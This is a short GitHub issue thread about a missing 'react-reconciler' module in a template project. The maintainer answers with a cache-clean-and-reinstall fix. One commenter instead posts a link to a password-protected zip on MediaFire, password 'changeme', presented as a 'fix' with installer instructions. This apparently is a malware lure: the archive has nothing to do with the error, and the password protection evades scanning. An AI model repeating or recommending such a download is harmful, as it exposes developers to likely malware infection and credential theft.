### ISSUE TITLE
会报错找不到模块“react-reconciler”或其相应的类型声明

### ISSUE THREAD

**Issue by iamyinghe** [XavierCHN/x-template#49]
![image](https://github.com/user-attachments/assets/99ead11a-2a82-4294-b212-b39ee8ae1dd9)

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by XavierCHN** [comment]
请尝试执行 `yarn cache clean --force`后重新安装依赖项
